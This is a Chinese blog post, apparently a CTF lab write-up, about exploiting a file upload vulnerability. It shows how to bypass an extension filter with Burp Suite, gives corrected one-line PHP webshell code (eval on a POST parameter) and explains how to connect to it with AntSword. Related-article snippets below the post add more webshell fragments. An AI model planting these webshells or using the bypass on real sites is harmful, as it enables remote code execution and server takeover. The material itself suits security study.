文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误

最新推荐文章于 2024-03-18 14:50:56 发布
最新推荐文章于 2024-03-18 14:50:56 发布
阅读量2.8w 收藏 62
点赞数 15
分类专栏: web安全 文件上传漏洞 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xionghuimin/article/details/106506988
版权

题目

在这里插入图片描述

第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开

在这里插入图片描述

第二步:把写有
<? php phpinfo(); @eval($_POST['shell']); ?>

代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,蚁剑也连接不上。

在这里插入图片描述
在这里插入图片描述

既然改成infors.php无法显示,那我就改成改成上传的过程中改成infors.txt看看在url
中打开的能不能显示了,发现是可以显示的。

在这里插入图片描述

第三步:那我在换个图片一句话木马

2.1

2.2
图片一句话木马也是没有连接成功

四、找错与反省

首先思路是没有错的,
1、检查前后端的文件上传是否有文件名限制
2、如果文件名有限制则通过burpsuite抓包修改文件名上传
3、上传成功后在用蚁剑或者菜刀进行webshell连接。

错误出在了哪里呢,经过求教群友和反思,错误点如下
错误一:
在第二步
是第二步infors.php文件的php代码语法出错,正确的写法应该是

<?php phpinfo(); @eval($_POST['shell']); ?>

真是尴尬基础不牢又不细心。可返回第二步查看截图并与上方正确代码进行对比,在补充php语法知识就能看懂错误在哪里了。

错误二:
在第三步
蚁剑进行webshell连接的时候,连接地址填写错误,连接地址正确的填写应该精确到一句话木马上传到的具体目录下。
在连接没有成功的情况下,
**

如果连接地址没填写错则会提示返回值为空, 如果是出现一大串代码则是你填写的地址错误

**(我本来要填upload/1.jpg结果填成了upload.jpg)
仔细看第三步的截图中蚁剑的连接地址

下次写一句话木马直接写

<?php @eval($_POST['shell']); echo"luck"; ?>

输出个luck等文字信息也更直观些,能够得到更多的反馈

若连接成功则如下
在这里插入图片描述

熊未泯
关注
  • 15
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
专栏目录
连接一句话木马
m0_64417923的博客
05-18 7880
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
teamwork:通过干净的 Ruby 包装器连接到 TeamworkPM API
06-20
团队合作宝石 Teamwork 是团队的项目管理软件。 这个 gem 试图尽可能接近 100% 的 API 覆盖率,有一些值得注意的漏洞是上传文件和管理公司。 我欢迎任何添加这些功能的拉取请求。 用法 要开始将gem "teamworkpm"添加到您的Gemfile (如果使用 Bundler)或运行gem install teamworkpm 。 为了使用teamworkpm gem,您需要拥有一个具有完整 API 访问权限的活动团队帐户。 您可以在阅读有关获取 API 密钥的文档。 验证 API 的身份验证是通过类方法authenticate 。 Teamwork.authenticate(api_key)将使您登录。失败的身份验证将返回401 ,否则返回已验证用户的帐户。 能力 帐户 Teamwork.account_info Teamwwork.authenticate(api
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一直报错怎么办(适合从未链接成功的人观看)
m0_63745032的博客
10-04 824
各种报错除了其他人说的,还有一个被他们忽略掉的问题,那就是win系统下安全中心,在每次把加载器解压出来的时候,win安全中心都会进行拦截并自动隔离,这个时候你需要点开,允许执行此操作,反复删除解压几次,一定要记得每次都允许执行,然后再次打开应该就没什么问题了。3.然后打开AntSword-Loader-v4.0.3-win32-x64里面的exe文件,这个时候会提示你让你选个文件夹初始化,选择文件夹到antSword-master这个文件夹下即可。作为刚开始接触的新人,一直各种报错怎么办?
【无标题】连接时候报错两种解决方法亲测有效
最新发布
2301_76815548的博客
03-18 681
那就是wifi的问题,看看自己是否连接了公司的无线网或者是校园网,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性,就比如说放置一些安全设备,所以用自己的流量就可以解决了。
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed]  Execute(HextoStr(“65786563757465287265717565737428636872283335292929”))  Function HextoStr(data)  HextoStr=”EXECUTE “””””  C=”&CHR(&H”  N=”)”  Do While Len(data)>1  If IsNumeric(Left(data,1)) Then  HextoStr=HextoStr&C&Left(data,2)&N  data=Mid
关于安装出现的问题不成功连不上webshell的问题
weixin_67426184的博客
04-20 3353
文件上传
DVWA靶场-----FIle Upload(文件上传
m0_65712192的博客
11-14 1668
DVWA靶场-----FIle Upload(文件上传
Burpsuite配合制作并连接图片马
多喝i热水的博客
01-28 8581
目录 制作图片马 利用文件包含漏洞 使用连接 制作图片马 利用文件包含漏洞 创建PHP文件包含解析图片马里的php脚本。upload-labs本身应该会包含一个include.php,模拟页面存在文件包含漏洞 使用连接 ...
中国中可能出现的问题
2201_75437983的博客
08-10 3003
(1)如果在最开始添加数据错误可能是在添加地址时的URL地址有两个http://它最开始就自带http://你可能没注意直接复制了网址就导致有两个http://。(3)这个连接失败情况可能是php代码出错,也可能是要关闭你的防火墙,关闭之后能ping通就是连接成功。(2)如果出现这种情况就是你的一句话木马php代码出错了。都没有成功最后是使用了这个。我跟着其他大佬使用过。这样能够连接成功了。
连接一句话木马演示
热门推荐
undefine
12-18 1万+
需要准备 一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。 我这里服务器用win2008R2系统 攻击机用win10 接下来我会演示 php一句话木马 其他脚本语言的一句话木马使用过程和这个差别不大 在服务器上安装phpstudy 快速搭建服务器 安装成功后启动apache 尝试打开网站,看看是否成功 出现下面的页面代表成功 现在服务端就配置成功了 现在在攻击端安装菜刀,等等类似工具,可以去看怎么
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 2574
无验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用连接 成...
一句话图片木马讲解.rar
08-25
一句话图片木马讲解,一句话图片木马讲解,一句话图片木马讲解
PHP 木马攻击防御技巧
12-18
1、防止跳出web目录 首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache /htdocs 这样,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effec
探索基于.NET下实现一句话木马之asmx篇1
08-03
云影实验室探索基于.NET 下实现一句话木马之 asmx 篇Ivan@360 云影实验室2018 年 07 月 18 日云影实验室0x01 前言上篇介绍了一般处
sqlmap注入——POST检测点方法
Xionghuimin的博客
06-03 5410
一、题目 二、解题过程 2.1 在输入框输入'号,发现有错误提示,说明存在sql注入 2.2 输入数字1我们可以看到他从数据库中调出了数据,从burpsuite的抓包情况来看,提交了id1=1&submit=Submit,但是url地址栏却没有任何显示,所以是post请求(如果是get请求则会在url地址栏中显示) 2.3.1 sqlmap注入——POST检测点,将burpsuit抓包到的request请求内容复制到一个文本文件然后改名为.log后缀名的文件如下所示,然后进行注入 2.3.2
view_source xctf 攻防世界 web新手练习区
Xionghuimin的博客
11-13 4841
view-source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开题目场景课看到的页面为 本题考查的知识点为 view-source 协议 解题过程 打开题目场景时,我们无法点击右键查看网页源码,根据上方view-source的知识点可解出flag,如下截图。 ...
连接文件管理乱码
09-07
连接文件管理乱码可能是由于以下原因导致的: 1. 文件编码问题:默认使用UTF-8编码进行文件管理,如果文件本身使用了其他编码方式,可能会导致乱码。解决方法是将文件编码转换为UTF-8。 2. 文件格式问题:可能无法正确解析某些特殊文件格式,例如二进制文件或加密文件。在这种情况下,建议使用其他适合的工具进行文件管理。 3. 版本问题:不同版本的可能存在一些bug或不兼容的问题,可能会导致文件管理时出现乱码。建议升级到最新版本或使用其他类似的工具。 总结一下,连接文件管理乱码可能是由于文件编码问题、文件格式问题或版本问题导致的。在遇到乱码问题时,可以尝试将文件编码转换为UTF-8,使用其他适合的工具进行文件管理,或升级到最新版本的。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值